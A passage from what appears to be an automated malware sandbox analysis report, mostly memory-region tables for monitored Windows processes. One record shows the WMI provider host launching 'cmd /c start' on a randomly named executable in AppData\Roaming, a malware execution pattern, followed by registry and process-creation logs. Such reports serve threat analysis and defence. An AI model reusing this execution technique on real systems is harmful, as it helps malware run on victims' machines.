private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x0000002872a10000 0x2872a10000 0x2872a8ffff Private Memory Readable, Writable True False False -
private_0x0000002872b10000 0x2872b10000 0x2872b8ffff Private Memory Readable, Writable True False False -
private_0x0000002872c00000 0x2872c00000 0x2872dfffff Private Memory Readable, Writable True False False -
private_0x0000002872f00000 0x2872f00000 0x2872ffffff Private Memory Readable, Writable True False False -
private_0x0000002873000000 0x2873000000 0x28730fffff Private Memory Readable, Writable True False False -
private_0x0000002873100000 0x2873100000 0x28731fffff Private Memory Readable, Writable True False False -
private_0x0000002873300000 0x2873300000 0x28733fffff Private Memory Readable, Writable True False False -
private_0x0000002873400000 0x2873400000 0x287347ffff Private Memory Readable, Writable True False False -
private_0x0000002873480000 0x2873480000 0x287357ffff Private Memory Readable, Writable True False False -
private_0x0000002873580000 0x2873580000 0x28735fffff Private Memory Readable, Writable True False False -
private_0x0000002873600000 0x2873600000 0x287367ffff Private Memory Readable, Writable True False False -
private_0x0000002873680000 0x2873680000 0x287377ffff Private Memory Readable, Writable True False False -
private_0x0000002873780000 0x2873780000 0x287387ffff Private Memory Readable, Writable True False False -
private_0x0000002873880000 0x2873880000 0x287397ffff Private Memory Readable, Writable True False False -
private_0x0000002873980000 0x2873980000 0x2873a7ffff Private Memory Readable, Writable True False False -
private_0x0000002873a80000 0x2873a80000 0x2873b7ffff Private Memory Readable, Writable True False False -
private_0x0000002873c80000 0x2873c80000 0x2873cfffff Private Memory Readable, Writable True False False -
private_0x0000002873d00000 0x2873d00000 0x2873dfffff Private Memory Readable, Writable True False False -
private_0x0000002873e00000 0x2873e00000 0x2873efffff Private Memory Readable, Writable True False False -
private_0x0000002873f00000 0x2873f00000 0x2873f7ffff Private Memory Readable, Writable True False False -
private_0x0000002873f80000 0x2873f80000 0x287407ffff Private Memory Readable, Writable True False False -
private_0x0000002874080000 0x2874080000 0x287417ffff Private Memory Readable, Writable True False False -
private_0x0000002874180000 0x2874180000 0x287427ffff Private Memory Readable, Writable True False False -
private_0x0000002874380000 0x2874380000 0x28743fffff Private Memory Readable, Writable True False False -
private_0x0000002874500000 0x2874500000 0x28745fffff Private Memory Readable, Writable True False False -
private_0x0000002874600000 0x2874600000 0x28746fffff Private Memory Readable, Writable True False False -
private_0x0000002874800000 0x2874800000 0x28748fffff Private Memory Readable, Writable True False False -
private_0x0000002874b00000 0x2874b00000 0x2874bfffff Private Memory Readable, Writable True False False -
private_0x0000002874c00000 0x2874c00000 0x2874c7ffff Private Memory Readable, Writable True False False -
private_0x0000002874c80000 0x2874c80000 0x2874cfffff Private Memory Readable, Writable True False False -
private_0x0000002874d00000 0x2874d00000 0x2874d7ffff Private Memory Readable, Writable True False False -
private_0x0000002874d80000 0x2874d80000 0x2874dfffff Private Memory Readable, Writable True False False -
private_0x0000002874e00000 0x2874e00000 0x2874efffff Private Memory Readable, Writable True False False -
private_0x0000002874f00000 0x2874f00000 0x2874ffffff Private Memory Readable, Writable True False False -
private_0x0000002875000000 0x2875000000 0x287507ffff Private Memory Readable, Writable True False False -
private_0x0000002875080000 0x2875080000 0x28750fffff Private Memory Readable, Writable True False False -
private_0x0000002875100000 0x2875100000 0x287517ffff Private Memory Readable, Writable True False False -
private_0x0000002875180000 0x2875180000 0x287527ffff Private Memory Readable, Writable True False False -
private_0x0000002875280000 0x2875280000 0x287537ffff Private Memory Readable, Writable True False False -
private_0x0000002875380000 0x2875380000 0x28753fffff Private Memory Readable, Writable True False False -
private_0x0000002875400000 0x2875400000 0x287547ffff Private Memory Readable, Writable True False False -
private_0x0000002875480000 0x2875480000 0x28754fffff Private Memory Readable, Writable True False False -
private_0x0000002875500000 0x2875500000 0x28755fffff Private Memory Readable, Writable True False False -
private_0x0000002875600000 0x2875600000 0x287567ffff Private Memory Readable, Writable True False False -
private_0x0000002875680000 0x2875680000 0x28756fffff Private Memory Readable, Writable True False False -
private_0x0000002875700000 0x2875700000 0x287577ffff Private Memory Readable, Writable True False False -
private_0x0000002875780000 0x2875780000 0x287587ffff Private Memory Readable, Writable True False False -
private_0x0000002875880000 0x2875880000 0x28758fffff Private Memory Readable, Writable True False False -
private_0x0000002875a00000 0x2875a00000 0x2875afffff Private Memory Readable, Writable True False False -
private_0x0000002875b00000 0x2875b00000 0x2875bfffff Private Memory Readable, Writable True False False -
private_0x0000002875c00000 0x2875c00000 0x2875cfffff Private Memory Readable, Writable True False False -
private_0x0000002875d00000 0x2875d00000 0x2875d7ffff Private Memory Readable, Writable True False False -
private_0x0000002875d80000 0x2875d80000 0x2875e7ffff Private Memory Readable, Writable True False False -
private_0x0000002876280000 0x2876280000 0x287637ffff Private Memory Readable, Writable True False False -
private_0x0000002876380000 0x2876380000 0x287647ffff Private Memory Readable, Writable True False False -
private_0x0000002876480000 0x2876480000 0x287657ffff Private Memory Readable, Writable True False False -
private_0x0000002876580000 0x2876580000 0x287667ffff Private Memory Readable, Writable True False False -
private_0x0000002876780000 0x2876780000 0x287687ffff Private Memory Readable, Writable True False False -
private_0x0000002876880000 0x2876880000 0x28768fffff Private Memory Readable, Writable True False False -
private_0x0000002876900000 0x2876900000 0x287697ffff Private Memory Readable, Writable True False False -
private_0x0000002876980000 0x2876980000 0x28769fffff Private Memory Readable, Writable True False False -
private_0x0000002876a00000 0x2876a00000 0x2876afffff Private Memory Readable, Writable True False False -
private_0x0000002876b00000 0x2876b00000 0x2876bfffff Private Memory Readable, Writable True False False -
private_0x0000002876c00000 0x2876c00000 0x2876cfffff Private Memory Readable, Writable True False False -
private_0x0000002876f00000 0x2876f00000 0x2876ffffff Private Memory Readable, Writable True False False -
private_0x0000002877400000 0x2877400000 0x28774fffff Private Memory Readable, Writable True False False -
private_0x0000002878a80000 0x2878a80000 0x2878b7ffff Private Memory Readable, Writable True False False -
private_0x0000002878c80000 0x2878c80000 0x2878d7ffff Private Memory Readable, Writable True False False -
private_0x0000002878d80000 0x2878d80000 0x2878e7ffff Private Memory Readable, Writable True False False -
private_0x0000002878e80000 0x2878e80000 0x2878f7ffff Private Memory Readable, Writable True False False -
private_0x0000002878f80000 0x2878f80000 0x287907ffff Private Memory Readable, Writable True False False -
private_0x0000002879100000 0x2879100000 0x28791fffff Private Memory Readable, Writable True False False -
private_0x0000002879200000 0x2879200000 0x287927ffff Private Memory Readable, Writable True False False -
private_0x0000002879380000 0x2879380000 0x28793fffff Private Memory Readable, Writable True False False -
private_0x0000002879400000 0x2879400000 0x287947ffff Private Memory Readable, Writable True False False -
private_0x0000002879480000 0x2879480000 0x28794fffff Private Memory Readable, Writable True False False -
private_0x0000002879800000 0x2879800000 0x28798fffff Private Memory Readable, Writable True False False -
private_0x0000002879b00000 0x2879b00000 0x2879bfffff Private Memory Readable, Writable True False False -
private_0x0000002879c00000 0x2879c00000 0x2879cfffff Private Memory Readable, Writable True False False -
private_0x0000002879d00000 0x2879d00000 0x2879dfffff Private Memory Readable, Writable True False False -
private_0x0000002879e00000 0x2879e00000 0x2879efffff Private Memory Readable, Writable True False False -
private_0x0000002879f00000 0x2879f00000 0x2879ffffff Private Memory Readable, Writable True False False -
private_0x000000287a000000 0x287a000000 0x287a0fffff Private Memory Readable, Writable True False False -
private_0x000000287a100000 0x287a100000 0x287a1fffff Private Memory Readable, Writable True False False -
private_0x000000287b380000 0x287b380000 0x287b3fffff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3b1c0000 0x17f3b1c0000 0x17f3b1cffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3b1d0000 0x17f3b1d0000 0x17f3b1d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3b1e0000 0x17f3b1e0000 0x17f3b1f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3b200000 0x17f3b200000 0x17f3b203fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3b210000 0x17f3b210000 0x17f3b210fff Pagefile Backed Memory Readable True False False -
private_0x0000017f3b220000 0x17f3b220000 0x17f3b220fff Private Memory Readable, Writable True False False -
private_0x0000017f3b230000 0x17f3b230000 0x17f3b236fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3b240000 0x17f3b240000 0x17f3b2fffff Pagefile Backed Memory Readable True False False -
private_0x0000017f3b300000 0x17f3b300000 0x17f3b3fffff Private Memory Readable, Writable True False False -
locale.nls 0x17f3b400000 0x17f3b4c4fff Memory Mapped File Readable False False False -
pagefile_0x0000017f3b4d0000 0x17f3b4d0000 0x17f3b650fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3b660000 0x17f3b660000 0x17f3b660fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3b670000 0x17f3b670000 0x17f3b670fff Private Memory Readable, Writable True False False -
private_0x0000017f3b680000 0x17f3b680000 0x17f3b680fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3b690000 0x17f3b690000 0x17f3b690fff Pagefile Backed Memory Readable True False False -
private_0x0000017f3b6a0000 0x17f3b6a0000 0x17f3b6a6fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3b6b0000 0x17f3b6b0000 0x17f3b6b0fff Pagefile Backed Memory Readable True False False -
r00000000000d.clb 0x17f3b6c0000 0x17f3b6c5fff Memory Mapped File Readable False False False -
private_0x0000017f3b6d0000 0x17f3b6d0000 0x17f3b6dffff Private Memory - True False False -
dosvc.dll.mui 0x17f3b6e0000 0x17f3b6e0fff Memory Mapped File Readable False False False -
pagefile_0x0000017f3b6f0000 0x17f3b6f0000 0x17f3b6f0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3b700000 0x17f3b700000 0x17f3b7fffff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3b800000 0x17f3b800000 0x17f3ba07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3ba10000 0x17f3ba10000 0x17f3be0ffff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x17f3be10000 0x17f3be13fff Memory Mapped File Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000017.db 0x17f3be20000 0x17f3be66fff Memory Mapped File Readable True False False -
cversions.2.db 0x17f3be70000 0x17f3be73fff Memory Mapped File Readable True False False -
pagefile_0x0000017f3be80000 0x17f3be80000 0x17f3be80fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3be90000 0x17f3be90000 0x17f3be92fff Pagefile Backed Memory Readable True False False -
activeds.dll.mui 0x17f3bea0000 0x17f3bea1fff Memory Mapped File Readable False False False -
pagefile_0x0000017f3bec0000 0x17f3bec0000 0x17f3bec0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000017f3bed0000 0x17f3bed0000 0x17f3bed0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3bee0000 0x17f3bee0000 0x17f3bee6fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3bef0000 0x17f3bef0000 0x17f3bf2bfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3bf30000 0x17f3bf30000 0x17f3bf30fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3bf40000 0x17f3bf40000 0x17f3bf40fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3bf50000 0x17f3bf50000 0x17f3bf61fff Private Memory Readable, Writable True False False -
private_0x0000017f3bf70000 0x17f3bf70000 0x17f3bf76fff Private Memory Readable, Writable True False False -
private_0x0000017f3bf80000 0x17f3bf80000 0x17f3bfc6fff Private Memory Readable, Writable True False False -
private_0x0000017f3bfd0000 0x17f3bfd0000 0x17f3bfd3fff Private Memory Readable, Writable True False False -
private_0x0000017f3bfe0000 0x17f3bfe0000 0x17f3bfeffff Private Memory Readable, Writable True False False -
private_0x0000017f3bff0000 0x17f3bff0000 0x17f3bffffff Private Memory Readable, Writable True False False -
private_0x0000017f3c000000 0x17f3c000000 0x17f3c0fffff Private Memory Readable, Writable True False False -
private_0x0000017f3c100000 0x17f3c100000 0x17f3c1fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x17f3c200000 0x17f3c536fff Memory Mapped File Readable False False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x17f3c540000 0x17f3c5d1fff Memory Mapped File Readable True False False -
pagefile_0x0000017f3c5e0000 0x17f3c5e0000 0x17f3c5effff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3c5f0000 0x17f3c5f0000 0x17f3c5fffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3c600000 0x17f3c600000 0x17f3c60ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3c610000 0x17f3c610000 0x17f3c61ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3c620000 0x17f3c620000 0x17f3c62ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3c630000 0x17f3c630000 0x17f3c63ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3c640000 0x17f3c640000 0x17f3c640fff Private Memory Readable, Writable True False False -
private_0x0000017f3c650000 0x17f3c650000 0x17f3c656fff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3c660000 0x17f3c660000 0x17f3c6adfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000017f3c6b0000 0x17f3c6b0000 0x17f3c6fdfff Private Memory Readable, Writable True False False -
private_0x0000017f3c700000 0x17f3c700000 0x17f3c7fffff Private Memory Readable, Writable True False False -
private_0x0000017f3c800000 0x17f3c800000 0x17f3c8fffff Private Memory Readable, Writable True False False -
private_0x0000017f3c900000 0x17f3c900000 0x17f3c9fffff Private Memory Readable, Writable True False False -
private_0x0000017f3ca00000 0x17f3ca00000 0x17f3cafffff Private Memory Readable, Writable True False False -
pagefile_0x0000017f3cb00000 0x17f3cb00000 0x17f3cb0ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3cb10000 0x17f3cb10000 0x17f3cb1ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000017f3cb20000 0x17f3cb20000 0x17f3cb2ffff Pagefile Backed Memory Readable, Writable True False False -
For performance reasons, the remaining 344 entries are omitted.
The remaining entries can be found in flog.txt.
Process #34: wmiprvse.exe
0 0
»
Information Value
ID #34
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:44, Reason: RPC Server
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:02
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x674
Parent PID 0x2e8 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 694
0x 9C8
0x 6FC
0x 774
0x 7B4
0x 828
0x 940
0x 1104
0x EC
0x 1124
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x0000002a04300000 0x2a04300000 0x2a0437ffff Private Memory Readable, Writable True False False -
private_0x0000002a04380000 0x2a04380000 0x2a043fffff Private Memory Readable, Writable True False False -
private_0x0000002a04400000 0x2a04400000 0x2a045fffff Private Memory Readable, Writable True False False -
private_0x0000002a04600000 0x2a04600000 0x2a0467ffff Private Memory Readable, Writable True False False -
private_0x0000002a04680000 0x2a04680000 0x2a046fffff Private Memory Readable, Writable True False False -
private_0x0000002a04700000 0x2a04700000 0x2a0477ffff Private Memory Readable, Writable True False False -
private_0x0000002a04780000 0x2a04780000 0x2a047fffff Private Memory Readable, Writable True False False -
private_0x0000002a04800000 0x2a04800000 0x2a0487ffff Private Memory Readable, Writable True False False -
private_0x0000002a04880000 0x2a04880000 0x2a048fffff Private Memory Readable, Writable True False False -
private_0x0000002a04900000 0x2a04900000 0x2a0497ffff Private Memory Readable, Writable True False False -
private_0x000001d786ff0000 0x1d786ff0000 0x1d78700ffff Private Memory Readable, Writable True False False -
pagefile_0x000001d786ff0000 0x1d786ff0000 0x1d786ffffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000001d787000000 0x1d787000000 0x1d787006fff Private Memory Readable, Writable True False False -
pagefile_0x000001d787010000 0x1d787010000 0x1d787027fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001d787030000 0x1d787030000 0x1d787033fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001d787040000 0x1d787040000 0x1d787040fff Pagefile Backed Memory Readable True False False -
private_0x000001d787050000 0x1d787050000 0x1d787050fff Private Memory Readable, Writable True False False -
locale.nls 0x1d787060000 0x1d787124fff Memory Mapped File Readable False False False -
private_0x000001d787130000 0x1d787130000 0x1d787136fff Private Memory Readable, Writable True False False -
private_0x000001d787140000 0x1d787140000 0x1d78723ffff Private Memory Readable, Writable True False False -
pagefile_0x000001d787240000 0x1d787240000 0x1d7872fffff Pagefile Backed Memory Readable True False False -
private_0x000001d787300000 0x1d787300000 0x1d787300fff Private Memory Readable, Writable True False False -
private_0x000001d787310000 0x1d787310000 0x1d787310fff Private Memory Readable, Writable True False False -
pagefile_0x000001d787320000 0x1d787320000 0x1d787321fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001d787330000 0x1d787330000 0x1d787330fff Pagefile Backed Memory Readable, Writable True False False -
user32.dll.mui 0x1d787340000 0x1d787344fff Memory Mapped File Readable False False False -
pagefile_0x000001d787350000 0x1d787350000 0x1d787350fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000001d787360000 0x1d787360000 0x1d78736ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x1d787370000 0x1d7876a6fff Memory Mapped File Readable False False False -
pagefile_0x000001d7876b0000 0x1d7876b0000 0x1d7878b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001d7878c0000 0x1d7878c0000 0x1d787a40fff Pagefile Backed Memory Readable True False False -
private_0x000001d787a50000 0x1d787a50000 0x1d787b4ffff Private Memory Readable, Writable True False False -
pagefile_0x000001d787b50000 0x1d787b50000 0x1d787b50fff Pagefile Backed Memory Readable True False False -
pagefile_0x000001d787b60000 0x1d787b60000 0x1d787b60fff Pagefile Backed Memory Readable True False False -
r00000000000d.clb 0x1d787b70000 0x1d787b75fff Memory Mapped File Readable False False False -
private_0x000001d787b80000 0x1d787b80000 0x1d787b8ffff Private Memory - True False False -
pagefile_0x000001d787b90000 0x1d787b90000 0x1d787b91fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00007df5ff6a0000 0x7df5ff6a0000 0x7ff5ff69ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff66be30000 0x7ff66be30000 0x7ff66bf2ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff66bf30000 0x7ff66bf30000 0x7ff66bf52fff Pagefile Backed Memory Readable True False False -
wmiprvse.exe 0x7ff66cf40000 0x7ff66cfbcfff Memory Mapped File Readable, Writable, Executable False False False -
cimwin32.dll 0x7ffb05670000 0x7ffb05841fff Memory Mapped File Readable, Writable, Executable False False False -
ncobjapi.dll 0x7ffb0e5f0000 0x7ffb0e604fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffb0f940000 0x7ffb0fa2ffff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffb106d0000 0x7ffb106dffff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffb127b0000 0x7ffb127d5fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffb127e0000 0x7ffb127f3fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffb13510000 0x7ffb13591fff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffb19310000 0x7ffb1935efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb20c30000 0x7ffb20c54fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ffb20d00000 0x7ffb20d28fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffb20d30000 0x7ffb20d5ffff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb20e00000 0x7ffb20e4bfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb20e50000 0x7ffb20e64fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb20e90000 0x7ffb20ea0fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb20f60000 0x7ffb20fc9fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ffb20fd0000 0x7ffb210c5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x7ffb210d0000 0x7ffb21257fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb21a10000 0x7ffb21c58fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x7ffb21e30000 0x7ffb21e4dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x7ffb21e50000 0x7ffb21ee9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb21ef0000 0x7ffb22039fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb22480000 0x7ffb225a4fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb225b0000 0x7ffb22650fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffb226c0000 0x7ffb2272bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb22840000 0x7ffb22866fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb22a10000 0x7ffb22acffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb22da0000 0x7ffb22e4dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb24310000 0x7ffb24368fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb243d0000 0x7ffb2446dfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb24470000 0x7ffb24768fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb24770000 0x7ffb2480cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
Process #35: cmd.exe
54 0
»
Information Value
ID #35
File Name c:\windows\system32\cmd.exe
Command Line cmd /c start C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:05:45, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xf0
Parent PID 0x674 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 84
0x 1230
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x000000a29dc10000 0xa29dc10000 0xa29dd0ffff Private Memory Readable, Writable True False False -
private_0x000000a29de00000 0xa29de00000 0xa29dffffff Private Memory Readable, Writable True False False -
private_0x000000a29e000000 0xa29e000000 0xa29e0fffff Private Memory Readable, Writable True False False -
private_0x0000028825280000 0x28825280000 0x2882529ffff Private Memory Readable, Writable True False False -
pagefile_0x0000028825280000 0x28825280000 0x2882528ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000028825290000 0x28825290000 0x28825296fff Private Memory Readable, Writable True False False -
pagefile_0x00000288252a0000 0x288252a0000 0x288252b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000288252c0000 0x288252c0000 0x288252c3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000288252d0000 0x288252d0000 0x288252d0fff Pagefile Backed Memory Readable True False False -
private_0x00000288252e0000 0x288252e0000 0x288252e0fff Private Memory Readable, Writable True False False -
private_0x00000288252f0000 0x288252f0000 0x288252f6fff Private Memory Readable, Writable True False False -
private_0x00000288253a0000 0x288253a0000 0x2882549ffff Private Memory Readable, Writable True False False -
locale.nls 0x288254a0000 0x28825564fff Memory Mapped File Readable False False False -
private_0x0000028825630000 0x28825630000 0x2882563ffff Private Memory Readable, Writable True False False -
private_0x0000028825640000 0x28825640000 0x2882573ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ffc90000 0x7df5ffc90000 0x7ff5ffc8ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff648bc0000 0x7ff648bc0000 0x7ff648cbffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648cc0000 0x7ff648cc0000 0x7ff648ce2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff6491b0000 0x7ff649212fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffb21a10000 0x7ffb21c58fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb22da0000 0x7ffb22e4dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb24770000 0x7ffb2480cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb24990000 0x7ffb24b6afff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (15)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\WINDOWS\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 7
Fn
Open STD_INPUT_HANDLE - True 5
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 4, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe os_pid = 0x608, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread (1)
»
Operation Process Additional Information Success Count Logfile
Resume c:\windows\system32\cmd.exe os_tid = 0x84 True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff6491b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffb22da0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\WINDOWS\system32\cmd.exe, size = 32743 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffb22dba990 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffb22dbe830 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffb22dbe300 True 1
Fn
